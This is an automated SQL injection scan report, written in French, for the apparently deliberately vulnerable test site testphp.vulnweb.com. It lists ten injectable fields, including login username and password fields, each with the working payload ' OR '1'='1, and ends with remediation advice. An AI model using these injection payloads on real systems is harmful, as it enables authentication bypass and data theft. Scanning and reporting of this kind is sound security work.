
==============================================
RAPPORT DE SCAN DE VULNÉRABILITÉS SQLi
==============================================
Date: 2025-03-03 20:29:35
Cible: http://testphp.vulnweb.com
URLs scannées: 11
Vulnérabilités trouvées: 10

VULNÉRABILITÉS DÉTECTÉES:

[1] Error-based SQLi
    URL: http://testphp.vulnweb.com
    Formulaire: http://testphp.vulnweb.com/search.php?test=query [Méthode: POST]
    Champ vulnérable: searchFor
    Payload efficace: ' OR '1'='1'--
    Détecté à: 2025-03-03 20:28:10

[2] Error-based SQLi
    URL: http://testphp.vulnweb.com/login.php
    Formulaire: http://testphp.vulnweb.com/userinfo.php [Méthode: POST]
    Champ vulnérable: uname
    Payload efficace: ' OR '1'='1'--
    Détecté à: 2025-03-03 20:28:26

[3] Error-based SQLi
    URL: http://testphp.vulnweb.com/login.php
    Formulaire: http://testphp.vulnweb.com/userinfo.php [Méthode: POST]
    Champ vulnérable: pass
    Payload efficace: ' OR '1'='1'--
    Détecté à: 2025-03-03 20:28:28

[4] Error-based SQLi
    URL: http://testphp.vulnweb.com/artists.php
    Formulaire: http://testphp.vulnweb.com/artists.php?artist=1 [Méthode: GET]
    Champ vulnérable: artist
    Payload efficace: ' OR '1'='1
    Détecté à: 2025-03-03 20:28:44

[5] Error-based SQLi
    URL: http://testphp.vulnweb.com/artists.php
    Formulaire: http://testphp.vulnweb.com/artists.php?artist=2 [Méthode: GET]
    Champ vulnérable: artist
    Payload efficace: ' OR '1'='1
    Détecté à: 2025-03-03 20:28:46

[6] Error-based SQLi
    URL: http://testphp.vulnweb.com/artists.php
    Formulaire: http://testphp.vulnweb.com/artists.php?artist=3 [Méthode: GET]
    Champ vulnérable: artist
    Payload efficace: ' OR '1'='1
    Détecté à: 2025-03-03 20:28:49

[7] Error-based SQLi
    URL: http://testphp.vulnweb.com/categories.php
    Formulaire: http://testphp.vulnweb.com/listproducts.php?cat=1 [Méthode: GET]
    Champ vulnérable: cat
    Payload efficace: ' OR '1'='1
    Détecté à: 2025-03-03 20:29:09

[8] Error-based SQLi
    URL: http://testphp.vulnweb.com/categories.php
    Formulaire: http://testphp.vulnweb.com/listproducts.php?cat=2 [Méthode: GET]
    Champ vulnérable: cat
    Payload efficace: ' OR '1'='1
    Détecté à: 2025-03-03 20:29:12

[9] Error-based SQLi
    URL: http://testphp.vulnweb.com/categories.php
    Formulaire: http://testphp.vulnweb.com/listproducts.php?cat=3 [Méthode: GET]
    Champ vulnérable: cat
    Payload efficace: ' OR '1'='1
    Détecté à: 2025-03-03 20:29:14

[10] Error-based SQLi
    URL: http://testphp.vulnweb.com/categories.php
    Formulaire: http://testphp.vulnweb.com/listproducts.php?cat=4 [Méthode: GET]
    Champ vulnérable: cat
    Payload efficace: ' OR '1'='1
    Détecté à: 2025-03-03 20:29:17

==============================================
RECOMMANDATIONS:
1. Utiliser des requêtes préparées ou des ORM
2. Valider et assainir toutes les entrées utilisateur
3. Implémenter un principe de moindre privilège pour les comptes DB
4. Activer les pare-feu applicatifs web (WAF)
==============================================
